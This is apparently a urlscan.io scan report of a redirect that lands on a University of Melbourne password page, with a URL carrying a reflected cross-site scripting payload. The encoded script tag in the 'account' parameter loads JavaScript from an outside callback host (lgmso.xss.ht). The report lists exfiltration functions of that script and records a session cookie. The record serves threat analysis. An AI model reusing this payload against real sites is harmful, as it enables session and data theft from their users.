Submitted URL: https://elgumso.com/los_sombreros_gris.html
Effective URL: https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script...
Submission: On May 12 via manual from AU — Scanned from DE

Summary

This website contacted 4 IPs in 2 countries across 3 domains to perform 9 HTTP transactions. The main IP is 128.250.83.171, located in Melbourne, Australia and belongs to UNIMELB-AS-AP The University of Melbourne, Melbourne, Victoria, AU. The main domain is cyberkey-web.unimelb.edu.au.
TLS certificate: Issued by DigiCert TLS RSA SHA256 2020 CA1 on February 7th 2022. Valid for: a year.
This is the only time cyberkey-web.unimelb.edu.au was scanned on urlscan.io!

urlscan.io Verdict: No classification

Domain & IP information

IP Address | AS Autonomous System
1 2 3.15.80.134 | 16509 (AMAZON-02)
3 128.250.83.171 | 10148 (UNIMELB-A...)
2 52.70.162.23 | 14618 (AMAZON-AES)
9 4

Apex Domain | Subdomains | Transfer
3 unimelb.edu.au | cyberkey-web.unimelb.edu.au | 2 KB
2 xss.ht | lgmso.xss.ht | 452 KB
2 elgumso.com | elgumso.com, www.elgumso.com | 839 B
9 3

Domain | Requested by
3 cyberkey-web.unimelb.edu.au | cyberkey-web.unimelb.edu.au, lgmso.xss.ht
2 lgmso.xss.ht | cyberkey-web.unimelb.edu.au, lgmso.xss.ht
1 www.elgumso.com
1 elgumso.com 1 redirects
9 4

This site contains no links.

Subject | Issuer | Validity | Valid
elgumso.com | R3 | 2022-03-18 - 2022-06-16 | 3 months
cyberkey-web.unimelb.edu.au | DigiCert TLS RSA SHA256 2020 CA1 | 2022-02-07 - 2023-02-06 | a year
*.xss.ht | AlphaSSL CA - SHA256 - G2 | 2022-04-24 - 2023-05-26 | a year

This page contains 2 frames:

Primary Page: https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C
Frame ID: BBEB3578A154FE0A14DF5EF43BD1E848
Requests: 9 HTTP requests in this frame

Frame: https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/default.css
Frame ID: 0907D08EE162E89BD9A117620C81315F
Requests: 1 HTTP requests in this frame

Page Title

Welcome

Page Statistics

Requests: 9
HTTPS: 67 %
IPv6: 0 %
Domains: 3
Subdomains: 4
IPs: 4
Countries: 2
Transfer: 455 kB
Size: 453 kB
Cookies: 1

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

  1. https://elgumso.com/los_sombreros_gris.html HTTP 301
    https://www.elgumso.com/los_sombreros_gris.html Page URL
  2. https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

Request Chain 0
  • https://elgumso.com/los_sombreros_gris.html HTTP 301
  • https://www.elgumso.com/los_sombreros_gris.html

9 HTTP transactions

Resource
Path
Size
x-fer
Type
MIME-Type
los_sombreros_gris.html
www.elgumso.com/
Redirect Chain
  • https://elgumso.com/los_sombreros_gris.html
  • https://www.elgumso.com/los_sombreros_gris.html
266 B
555 B
Document
General
Full URL
https://www.elgumso.com/los_sombreros_gris.html
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_128_GCM
Server
3.15.80.134 Columbus, United States, ASN16509 (AMAZON-02, US),
Reverse DNS
ec2-3-15-80-134.us-east-2.compute.amazonaws.com
Software
Apache/2.4.46 (Ubuntu) /
Resource Hash
93b1172b199635853266c051c5dd1d138ce293c99a453ad029fe57bb10fa9698

Request headers

Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
accept-language
de-DE,de;q=0.9

Response headers

Accept-Ranges
bytes
Connection
Keep-Alive
Content-Encoding
gzip
Content-Length
218
Content-Type
text/html
Date
Thu, 12 May 2022 06:06:43 GMT
ETag
"10a-5deca3df7c54d-gzip"
Keep-Alive
timeout=5, max=100
Last-Modified
Thu, 12 May 2022 05:58:07 GMT
Server
Apache/2.4.46 (Ubuntu)
Vary
Accept-Encoding

Redirect headers

Connection
Keep-Alive
Content-Length
333
Content-Type
text/html; charset=iso-8859-1
Date
Thu, 12 May 2022 06:06:43 GMT
Keep-Alive
timeout=5, max=100
Location
https://www.elgumso.com/los_sombreros_gris.html
Server
Apache/2.4.46 (Ubuntu)
Primary Request Password.do
cyberkey-web.unimelb.edu.au/CyberAuditWeb/mobile/
982 B
1 KB
Document
General
Full URL
https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_256_GCM
Server
128.250.83.171 Melbourne, Australia, ASN10148 (UNIMELB-AS-AP The University of Melbourne, Melbourne, Victoria, AU),
Reverse DNS
sec-srv-eka-vm.pb.unimelb.edu.au
Software
nginx /
Resource Hash
f8dd17b916858f476658f024b7537fc0b37482ccc8f919abbe1fdf525716e973
Security Headers
Name Value
X-Content-Type-Options nosniff
X-Frame-Options DENY

Request headers

Referer
https://www.elgumso.com/
Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
accept-language
de-DE,de;q=0.9

Response headers

Connection
keep-alive
Content-Length
982
Content-Type
text/html;charset=UTF-8
Date
Thu, 12 May 2022 06:06:34 GMT
Server
nginx
X-Content-Type-Options
nosniff
X-Frame-Options
DENY
default.css
cyberkey-web.unimelb.edu.au/CyberAuditWeb/mobile/
191 B
461 B
Stylesheet
General
Full URL
https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/default.css
Requested by
Host: cyberkey-web.unimelb.edu.au
URL: https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_256_GCM
Server
128.250.83.171 Melbourne, Australia, ASN10148 (UNIMELB-AS-AP The University of Melbourne, Melbourne, Victoria, AU),
Reverse DNS
sec-srv-eka-vm.pb.unimelb.edu.au
Software
nginx /
Resource Hash
62c1258ef7b635abe60e8c151f08ebaa5300eaacd85ad84640ffdb24cd1164e9
Security Headers
Name Value
X-Content-Type-Options nosniff

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36

Response headers

Date
Thu, 12 May 2022 06:06:35 GMT
X-Content-Type-Options
nosniff
Last-Modified
Tue, 09 Oct 2018 02:21:48 GMT
Server
nginx
ETag
W/"191-1539051708000"
Content-Type
text/css
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
191
/
lgmso.xss.ht/
451 KB
452 KB
Script
General
Full URL
https://lgmso.xss.ht/
Requested by
Host: cyberkey-web.unimelb.edu.au
URL: https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_256_GCM
Server
52.70.162.23 Ashburn, United States, ASN14618 (AMAZON-AES, US),
Reverse DNS
ec2-52-70-162-23.compute-1.amazonaws.com
Software
nginx/1.14.0 (Ubuntu) /
Resource Hash
7d8184041fc1d90491cb20698cf6249228b257718099b0c5f8e2429674e0c4f5
Security Headers
Name Value
Content-Security-Policy default-src 'self'
Strict-Transport-Security max-age=31536000; includeSubDomains; preload
X-Content-Type-Options nosniff
X-Frame-Options deny
X-Xss-Protection 1; mode=block

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://cyberkey-web.unimelb.edu.au:8443/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36

Response headers

Content-Security-Policy
default-src 'self'
X-Content-Type-Options
nosniff
Connection
keep-alive
Content-Length
461702
X-Xss-Protection
1; mode=block
Pragma
no-cache
Server
nginx/1.14.0 (Ubuntu)
X-Frame-Options
deny
Date
Thu, 12 May 2022 06:06:46 GMT
Strict-Transport-Security
max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Methods
OPTIONS, PUT, DELETE, POST, GET
Content-Type
application/x-javascript
Access-Control-Allow-Origin
*
Cache-Control
no-cache, no-store, must-revalidate
Access-Control-Allow-Credentials
true
Access-Control-Allow-Headers
X-Requested-With, Content-Type, Origin, Authorization, Accept, Accept-Encoding
Expires
0
default.css
cyberkey-web.unimelb.edu.au/CyberAuditWeb/mobile/ Frame 0907
191 B
461 B
Stylesheet
General
Full URL
https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/default.css
Requested by
Host: lgmso.xss.ht
URL: https://lgmso.xss.ht/
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_256_GCM
Server
128.250.83.171 Melbourne, Australia, ASN10148 (UNIMELB-AS-AP The University of Melbourne, Melbourne, Victoria, AU),
Reverse DNS
sec-srv-eka-vm.pb.unimelb.edu.au
Software
nginx /
Resource Hash
62c1258ef7b635abe60e8c151f08ebaa5300eaacd85ad84640ffdb24cd1164e9
Security Headers
Name Value
X-Content-Type-Options nosniff

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36

Response headers

Date
Thu, 12 May 2022 06:06:35 GMT
X-Content-Type-Options
nosniff
Last-Modified
Tue, 09 Oct 2018 02:21:48 GMT
Server
nginx
ETag
W/"191-1539051708000"
Content-Type
text/css
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
191
truncated
/
42 B
0
Image
General
Full URL
data:truncated
Protocol
DATA
Server
-, , ASN (),
Reverse DNS
Software
/
Resource Hash
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629

Request headers

accept-language
de-DE,de;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36

Response headers

Content-Type
image/gif
js_callback
lgmso.xss.ht/
2 B
637 B
XHR
General
Full URL
https://lgmso.xss.ht/js_callback
Requested by
Host: lgmso.xss.ht
URL: https://lgmso.xss.ht/
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_256_GCM
Server
52.70.162.23 Ashburn, United States, ASN14618 (AMAZON-AES, US),
Reverse DNS
ec2-52-70-162-23.compute-1.amazonaws.com
Software
nginx/1.14.0 (Ubuntu) /
Resource Hash
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
Security Headers
Name Value
Content-Security-Policy default-src 'self'
Strict-Transport-Security max-age=31536000; includeSubDomains; preload
X-Content-Type-Options nosniff
X-Frame-Options deny
X-Xss-Protection 1; mode=block

Request headers

Referer
https://cyberkey-web.unimelb.edu.au:8443/
accept-language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Content-type
text/plain

Response headers

Content-Security-Policy
default-src 'self'
X-Content-Type-Options
nosniff
Connection
keep-alive
Content-Length
2
X-Xss-Protection
1; mode=block
Pragma
no-cache
Server
nginx/1.14.0 (Ubuntu)
X-Frame-Options
deny
Date
Thu, 12 May 2022 06:06:48 GMT
Strict-Transport-Security
max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Methods
POST, GET, HEAD, OPTIONS
Content-Type
application/x-javascript
Access-Control-Allow-Origin
*
Cache-Control
no-cache, no-store, must-revalidate
Access-Control-Allow-Credentials
true
Access-Control-Allow-Headers
X-Requested-With
Expires
0
crossdomain.xml
cyberkey-web.unimelb.edu.au/
0
0

clientaccesspolicy.xml
cyberkey-web.unimelb.edu.au/
0
0

robots.txt
cyberkey-web.unimelb.edu.au/
0
0

Failed requests

These URLs were requested, but there was no response received. You will also see them in the list above.

Domain
cyberkey-web.unimelb.edu.au
URL
https://cyberkey-web.unimelb.edu.au/crossdomain.xml
Domain
cyberkey-web.unimelb.edu.au
URL
https://cyberkey-web.unimelb.edu.au/clientaccesspolicy.xml
Domain
cyberkey-web.unimelb.edu.au
URL
https://cyberkey-web.unimelb.edu.au/robots.txt

22 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

object| oncontextlost
object| oncontextrestored
function| structuredClone
function| getScreenDetails
string| pgp_key
string| pgp_email_template
string| chainload_uri
object| collect_page_list
function| generate_pgp_encrypted_email
function| get_guid
function| never_null
function| contact_mothership
function| send_collected_page
function| collect_page_data
function| collect_pages
function| eval_remote_source
function| addEvent
function| hook_load_if_not_ready
function| finishing_moves
function| html2canvas
object| openpgp
object| probe_return_data

1 Cookies

Domain/Path: cyberkey-web.unimelb.edu.au/CyberAuditWeb
Name: JSESSIONID
Value: D90D7A1CCDAA3D01245CF354BB303B2C